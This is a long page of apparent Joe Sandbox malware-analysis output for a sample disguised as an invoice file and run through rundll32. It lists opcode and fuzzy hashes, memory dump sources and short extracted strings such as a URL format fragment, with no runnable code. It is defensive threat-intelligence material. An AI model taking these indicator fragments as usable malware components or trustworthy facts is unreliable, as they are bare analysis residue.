                                                                                  • API String ID:
                                                                                  • Opcode ID: f2deeaa1b49debc8549676a7211649077028046c4dc58dbc17e15b3e03bd569e
                                                                                  • Instruction ID: 88f49872172ab8d7a0690337c5ec1f6c31646099698f8a8c14f6319c88e4a455
                                                                                  • Opcode Fuzzy Hash: f2deeaa1b49debc8549676a7211649077028046c4dc58dbc17e15b3e03bd569e
                                                                                  • Instruction Fuzzy Hash: DCD05E35710210978A142AAAA80852A7EDED7CD672B5405BEFA4AC7340DEB19C054BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c1f563dd9c00b9d89ff01dd27ee43ef5dc307332d5df8d8d18ca9b25310bd6b0
                                                                                  • Instruction ID: 0d4c5bbe20cca5266a82c8741684f95c843998a5a133a0bbee9956a13cd5544f
                                                                                  • Opcode Fuzzy Hash: c1f563dd9c00b9d89ff01dd27ee43ef5dc307332d5df8d8d18ca9b25310bd6b0
                                                                                  • Instruction Fuzzy Hash: 06D05B3730011CDF8B166B70D408C8EBF9ADF49250301807AF5058B161DE37D851DBC4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5a762bbfdcb394675dbc59d433ddbaba2d40256a5df0c3f81e5f1a08aa911bcb
                                                                                  • Instruction ID: 676bca9de1d7f3e2f52164a2adbcea81ba1b35776a65d4d45b42f1bde38a4b45
                                                                                  • Opcode Fuzzy Hash: 5a762bbfdcb394675dbc59d433ddbaba2d40256a5df0c3f81e5f1a08aa911bcb
                                                                                  • Instruction Fuzzy Hash: FFD01730A00209EF8B14EFB9EA0165DBBF9FB45224B1041E9D808D3214EB312F089B80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 838b446659224fad0d59d0ce4a003bb36fa41a4eb6c26bc426a6951553cfd9a1
                                                                                  • Instruction ID: bd3f4b22d46ffce26c29f5a48945f67ac90e522f125a786226550f7881715a20
                                                                                  • Opcode Fuzzy Hash: 838b446659224fad0d59d0ce4a003bb36fa41a4eb6c26bc426a6951553cfd9a1
                                                                                  • Instruction Fuzzy Hash: 91D0127091014DEF8B40DFA8E94665D7BF5FB45210B5045E9D408D3218EE311F049B40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3c67c792068b1ec771839f7e4d196286b299b89385c34c5273f0994cea76c63
                                                                                  • Instruction ID: 4a806b4367c2404959058bb8d6cfa8e4a7153bfb9d0bbaf489eb4436d9bb714e
                                                                                  • Opcode Fuzzy Hash: a3c67c792068b1ec771839f7e4d196286b299b89385c34c5273f0994cea76c63
                                                                                  • Instruction Fuzzy Hash: A7D0127275803097CA54C11CDC92789D3E5CB99228F78C97AE948C3B55CA6ADD0382C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b91edc2001b927e45d803a272479da7d6b0cccfb9d2c14f78ac15a58686b6b4
                                                                                  • Instruction ID: 82f5eeb0865c2b964733b38802d3342cc1000945bda438514b72b6e1e1933986
                                                                                  • Opcode Fuzzy Hash: 1b91edc2001b927e45d803a272479da7d6b0cccfb9d2c14f78ac15a58686b6b4
                                                                                  • Instruction Fuzzy Hash: 5AD0C9747152108BCB24DB2CE980D6977EAAF8C2253515999E586CF324EE60DD428B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 810cbb2b88db3bed5b40d3e52438ca290ce2fd82ca06f9802ebbc61b02cb9a36
                                                                                  • Instruction ID: ce5195741d48d238bddc311caedabaaadc6b0d9d907ec82af3f390063a86afa5
                                                                                  • Opcode Fuzzy Hash: 810cbb2b88db3bed5b40d3e52438ca290ce2fd82ca06f9802ebbc61b02cb9a36
                                                                                  • Instruction Fuzzy Hash: 95C080330543075FCB015754EF4738437A8D711218FA49230F4CCC4D14D71D9446C555
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91f971a35c4c78dc4b4c0be46310968e9e7f98bf6da83340b6ae16a0e2b44dec
                                                                                  • Instruction ID: d0a0a5e1a3b9b9b0cee035bd52b86554e14c3e6132bdfbc63c7253a8602ab962
                                                                                  • Opcode Fuzzy Hash: 91f971a35c4c78dc4b4c0be46310968e9e7f98bf6da83340b6ae16a0e2b44dec
                                                                                  • Instruction Fuzzy Hash: 9DC08C31B0262C8783292768E00489AB7EEDB8DA62300007EE58A83700CE76AC02C7C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4f223558d62ede59bec183b58b37cbf3ab021032b1587b64fa0f8df4676b459
                                                                                  • Instruction ID: 852bbce755cf05c96e3aa6fea106904441006d76da806813eaa022cd11736ab2
                                                                                  • Opcode Fuzzy Hash: b4f223558d62ede59bec183b58b37cbf3ab021032b1587b64fa0f8df4676b459
                                                                                  • Instruction Fuzzy Hash: C7D0C9384A52488FEF32CF7AE49A7343FF2E711325F15116AE485CB615CBAC8089CB16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99976a0e7d2743b876782d366b344b3df071d4b53b4197cb48cc314ef46b84cb
                                                                                  • Instruction ID: 5739635c3a0abee1fc9ac6bab68b01391a63d8578e65d191cd5f26b781ee2b4d
                                                                                  • Opcode Fuzzy Hash: 99976a0e7d2743b876782d366b344b3df071d4b53b4197cb48cc314ef46b84cb
                                                                                  • Instruction Fuzzy Hash: 51D012124192C18FDFC6A724C4115503F34AF5315470D42D2C0D4C7153D11D8C05EB25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 700c3c2e85428e282ebd1fc922a3a52d926c4d600c943a2748fd3b04c75c57e9
                                                                                  • Instruction ID: 45f3ca450846b886ded9e3c152dc51f801595628fc43192c8dcac7e0f0a719b4
                                                                                  • Opcode Fuzzy Hash: 700c3c2e85428e282ebd1fc922a3a52d926c4d600c943a2748fd3b04c75c57e9
                                                                                  • Instruction Fuzzy Hash: BCB092B090530CAF8620DA99980186ABBACDB0A210F0001D9E90887320D972AD1066D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 49c0519a41738a28d346965565ce0dfa7d55c172ce8998116a9685d1548fc545
                                                                                  • Instruction ID: b9d2a01d999594d1a39bee404b58d0807da954e726ad9797c8c1d05c509bd8f3
                                                                                  • Opcode Fuzzy Hash: 49c0519a41738a28d346965565ce0dfa7d55c172ce8998116a9685d1548fc545
                                                                                  • Instruction Fuzzy Hash: 69C012326000008BC708CB64CE92A01BB71AF81208B19C5ECD8098B687CB26EC03CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99c0926a78d1d1cb5439208f3459f914297360a845b6f6929f374857589f5e57
                                                                                  • Instruction ID: 310f8159ec3a79eb68575433c4d151b60ea2581b0bbe41b3d5de802a692c99c3
                                                                                  • Opcode Fuzzy Hash: 99c0926a78d1d1cb5439208f3459f914297360a845b6f6929f374857589f5e57
                                                                                  • Instruction Fuzzy Hash: 2BC0483AA0000D8B8F10DAC4F8858DDFB71EB8422AB204262E619A25108A312A6BCB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5821fb1b9c631ca6b4c57aae7c23b0ed6c7f91f6acfb33b65e91aada96f18b8f
                                                                                  • Instruction ID: 660560765daf53e395b6e9423dc552382dfe0a61fdf3aa5e5354d0dde8d64621
                                                                                  • Opcode Fuzzy Hash: 5821fb1b9c631ca6b4c57aae7c23b0ed6c7f91f6acfb33b65e91aada96f18b8f
                                                                                  • Instruction Fuzzy Hash: AFB012A662110047DF048610EC8FBD937139780204F190874B00AC4340FE19C4018541
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52c758b392cec583e6e68a88c6566c7b2886d925c601a7c3154e0c6958d19afc
                                                                                  • Instruction ID: 6004c85adfea28ff6a5089458774a7df26005dc8d303d81be3e48aaebf188ab1
                                                                                  • Opcode Fuzzy Hash: 52c758b392cec583e6e68a88c6566c7b2886d925c601a7c3154e0c6958d19afc
                                                                                  • Instruction Fuzzy Hash: 5EC08CB000004083CA00CA14CA4A74A7321AB40304F20C464A6404A345C234CC10CA85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 608ff15706b87c6dd2964839cda223ccd41af2eee7e21ffae45c85b79948397c
                                                                                  • Instruction ID: 34a3cdeda9a7e5b311fee35d7a75c2b3a5aff75d007382d2f149f7c212051151
                                                                                  • Opcode Fuzzy Hash: 608ff15706b87c6dd2964839cda223ccd41af2eee7e21ffae45c85b79948397c
                                                                                  • Instruction Fuzzy Hash: 56B0123305030F4FC74067A5FA066083B1DF7413087448231B00C495299F6A2C184BD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff09b62adf8ab516422318c4100b5b0007d1ddd432046db1a93ed8424b1733bc
                                                                                  • Instruction ID: 9cd9da67ae54cb9c2d6beb0c9c65b64e394dcb2c1adfdf344d5e5cd8499625f6
                                                                                  • Opcode Fuzzy Hash: ff09b62adf8ab516422318c4100b5b0007d1ddd432046db1a93ed8424b1733bc
                                                                                  • Instruction Fuzzy Hash: F6B0123E251200CFE7047630D44114C7226EB5310C3D8409CC4054D241C73BC403C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                  • Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
                                                                                  • Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                  • Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hcq$Hcq
                                                                                  • API String ID: 0-4088181183
                                                                                  • Opcode ID: f74040b166424eca0f476d50de92d0e2ef862323fa7a70b6cdfce1f7bc79d938
                                                                                  • Instruction ID: 701be7b47c88807461da1a2c86935ec598df3f1715f7ece474cdb96a247d9e0e
                                                                                  • Opcode Fuzzy Hash: f74040b166424eca0f476d50de92d0e2ef862323fa7a70b6cdfce1f7bc79d938
                                                                                  • Instruction Fuzzy Hash: 7CE16031D1061A9FCF01DFA8C8405DEFBB1FF99310F25965AE555BB214EB30AA86CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q
                                                                                  • API String ID: 0-2033115326
                                                                                  • Opcode ID: 4067fc7d7156aac447ee8ade46187717cb610dd46ebc7465c64a7aa4f81b16c5
                                                                                  • Instruction ID: 0c5e181abd00bbc0ca1ec16f0ca506b75292415d452fd9aa8f02e2b6fc791c23
                                                                                  • Opcode Fuzzy Hash: 4067fc7d7156aac447ee8ade46187717cb610dd46ebc7465c64a7aa4f81b16c5
                                                                                  • Instruction Fuzzy Hash: C7222B34B002148FDB29DB38C998A6DB7F6AF89214F1585A8D50ADB3A5DF35DD82CF40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                                  • API String ID: 0-507403070
                                                                                  • Opcode ID: f695413afc71a649ecebbd1acffd04d05afb2ae044c5d96f3dc03401b416720c
                                                                                  • Instruction ID: 629182cb2b77ea037466a8a4a20bc0783c84c70f3af08d3c3ebb52ee8f716c68
                                                                                  • Opcode Fuzzy Hash: f695413afc71a649ecebbd1acffd04d05afb2ae044c5d96f3dc03401b416720c
                                                                                  • Instruction Fuzzy Hash: 2C51E5717803165BD71CA76D8E54B2F2AEFBBC8740F544999A049CB3ACED68DC0A43E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                                  • API String ID: 0-2216122830
                                                                                  • Opcode ID: 525d61c61054e0fe7cccf2fa2775ec0e4338fe729d1b6d2071978a335d8dec68
                                                                                  • Instruction ID: 0dcb733685919a0ace2dc119388b9faa6a7ff7b3ef76386ee4c12524adbf039f
                                                                                  • Opcode Fuzzy Hash: 525d61c61054e0fe7cccf2fa2775ec0e4338fe729d1b6d2071978a335d8dec68
                                                                                  • Instruction Fuzzy Hash: 3E4105707843174BD318A77D8D54B2E2BEBBBC8700F5449AAA049CB3ADDD58DC0943E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                                                  • API String ID: 0-155944776
                                                                                  • Opcode ID: 6603a7f5923f97001deccdf14a2928974679031452e829939554116b8542f144
                                                                                  • Instruction ID: b894ead994c54ac989bfa26e89126151a88f5b3f44b99ea1545343d3ebcc3539
                                                                                  • Opcode Fuzzy Hash: 6603a7f5923f97001deccdf14a2928974679031452e829939554116b8542f144
                                                                                  • Instruction Fuzzy Hash: 9131E2717843174BC319EB7D8D64B1F2BFBABC8700B5409AAA049C73ADDD589C0943E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q$4'_q$4'_q$4'_q
                                                                                  • API String ID: 0-4157139909
                                                                                  • Opcode ID: ded680b2fa90f2f7331e6392482cd631b3a639a76514c49c892926c9581cde5d
                                                                                  • Instruction ID: 9cc346ecb519ac85628b36138531fdbe070d1642f4c6dc656c11978c573d8f7b
                                                                                  • Opcode Fuzzy Hash: ded680b2fa90f2f7331e6392482cd631b3a639a76514c49c892926c9581cde5d
                                                                                  • Instruction Fuzzy Hash: FD02A574A006068FCB18DF69C484AAEBBF2FF88314F148569E559DB7A5DB34ED41CB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q$$_q$$_q
                                                                                  • API String ID: 0-1171383116
                                                                                  • Opcode ID: 4100142b0087b0074d01b016de2daaa22bc8143ef1d5b19c06230511824648ef
                                                                                  • Instruction ID: 01c9783a1a1bc1c3fab57fd35efc1928a9ed326252bd5e08c7f330f65ac5650c
                                                                                  • Opcode Fuzzy Hash: 4100142b0087b0074d01b016de2daaa22bc8143ef1d5b19c06230511824648ef
                                                                                  • Instruction Fuzzy Hash: 393118717443164BD319EB798D54B2E2BFBBBC9700B5449A9E049CB3ADDD18DC0A83E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq$CloseStreamHandler$ry/v{0}/?r={1}
                                                                                  • API String ID: 0-3870076143
                                                                                  • Opcode ID: 1cfdeb36fcbd10da83384ab055f842c773f2cd09d9b014e8e84aa77ec9b9e5db
                                                                                  • Instruction ID: 89f0134488dd50827f071666e954478fc3941ad848b36086452f6362041679d0
                                                                                  • Opcode Fuzzy Hash: 1cfdeb36fcbd10da83384ab055f842c773f2cd09d9b014e8e84aa77ec9b9e5db
                                                                                  • Instruction Fuzzy Hash: 2971B635B002249FDB149BB5C954B6EB6E7FFC8310F188429E506EB3A4DE74ED029791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq$CloseStreamHandler$LR_q
                                                                                  • API String ID: 0-1752038968
                                                                                  • Opcode ID: ee5c4eb47fcda778218ff2039fc546a5e0ec0297ebddb9b688d52683ce1c9297
                                                                                  • Instruction ID: b31bfdd11c50278210464d20ec4a43c45076a7b3be6a24e7178071083dbc7e3f
                                                                                  • Opcode Fuzzy Hash: ee5c4eb47fcda778218ff2039fc546a5e0ec0297ebddb9b688d52683ce1c9297
                                                                                  • Instruction Fuzzy Hash: DD4123347002249FEB089B78995477E3BABEBC4704F0488AAE406CB3D9EE74ED059791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q
                                                                                  • API String ID: 0-458585787
                                                                                  • Opcode ID: c81fdc6a3f66c6c629c4fbee25a89181a3b98633493c760d733dd1e6fe3fe809
                                                                                  • Instruction ID: 2ed1062f21ac271af106905457bf0e389fea7996a1458955582bc8c8a7c51a7b
                                                                                  • Opcode Fuzzy Hash: c81fdc6a3f66c6c629c4fbee25a89181a3b98633493c760d733dd1e6fe3fe809
                                                                                  • Instruction Fuzzy Hash: D151C035B012199FD714DFB9D9506AEBBE6FBC8750B18812AE404DB364DE70AD02C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq$CloseStreamHandler
                                                                                  • API String ID: 0-1094765722
                                                                                  • Opcode ID: 8b46f528eb44dcdf3f7dca8a78b56ff19f14f9a680ad4186dab20574c8da97c5
                                                                                  • Instruction ID: f91891ee35721d7e0f068424f454aba2c4f836d0146f2b23aaa00d6f2d96a21b
                                                                                  • Opcode Fuzzy Hash: 8b46f528eb44dcdf3f7dca8a78b56ff19f14f9a680ad4186dab20574c8da97c5
                                                                                  • Instruction Fuzzy Hash: EB3126307052645BF715667A89643BE7BE79BC6314F1984AAD502E7382CEB86C0683A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q
                                                                                  • API String ID: 0-458585787
                                                                                  • Opcode ID: a98cd635acb41244102c5f85dda32fabec57a6bf3fd676df2ba1de5b2803a6e9
                                                                                  • Instruction ID: a811422866e240b6e325cc4ff2bdfd2f5eb5424592ecf8c63ea97543806e2f35
                                                                                  • Opcode Fuzzy Hash: a98cd635acb41244102c5f85dda32fabec57a6bf3fd676df2ba1de5b2803a6e9
                                                                                  • Instruction Fuzzy Hash: DB315034A10219EBDB189B65C9587AE7BF6BF88304F14C429D802AB395DFB5AC45CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq$CloseStreamHandler
                                                                                  • API String ID: 0-1094765722
                                                                                  • Opcode ID: 9f62cfd9e7b92207a579d8c3c595f8d7cd0bae475a33d4569bc3506bca4e2a40
                                                                                  • Instruction ID: a56d62d688ee48b98f7d3f8bee3451fc127184dafb5230ddb940d866787682e5
                                                                                  • Opcode Fuzzy Hash: 9f62cfd9e7b92207a579d8c3c595f8d7cd0bae475a33d4569bc3506bca4e2a40
                                                                                  • Instruction Fuzzy Hash: 690166257083604BE7189A3A449433F2A97EFC5314F08C46BDA06D73D1DE78EC01D365
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: 9d30d5bdfbf1080e27f375205cc032c39f6a888ade5168371ed60a2f37c6ec8c
                                                                                  • Instruction ID: ab87d1c6d092eb86d2f51a5bd6e6926b1484cc90415488e11c9c3e7554663b42
                                                                                  • Opcode Fuzzy Hash: 9d30d5bdfbf1080e27f375205cc032c39f6a888ade5168371ed60a2f37c6ec8c
                                                                                  • Instruction Fuzzy Hash: A781D130B10225DFDB149F65E958B6EBBF2FF84704F108429D406AB390DBB8AD45CBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CloseStreamHandler
